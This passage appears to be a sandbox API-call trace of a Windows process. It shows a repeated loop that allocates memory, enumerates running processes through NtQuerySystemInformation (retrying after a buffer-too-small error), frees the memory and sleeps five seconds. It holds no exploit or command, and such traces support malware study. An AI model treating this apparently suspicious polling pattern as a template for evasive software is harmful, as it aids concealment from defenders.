BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.620] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.632] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.649] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.663] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.681] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.694] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.711] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.726] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.742] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.757] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.772] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.787] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.820] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.834] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.850] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.875] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.882] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.923] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.937] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.943] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.960] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 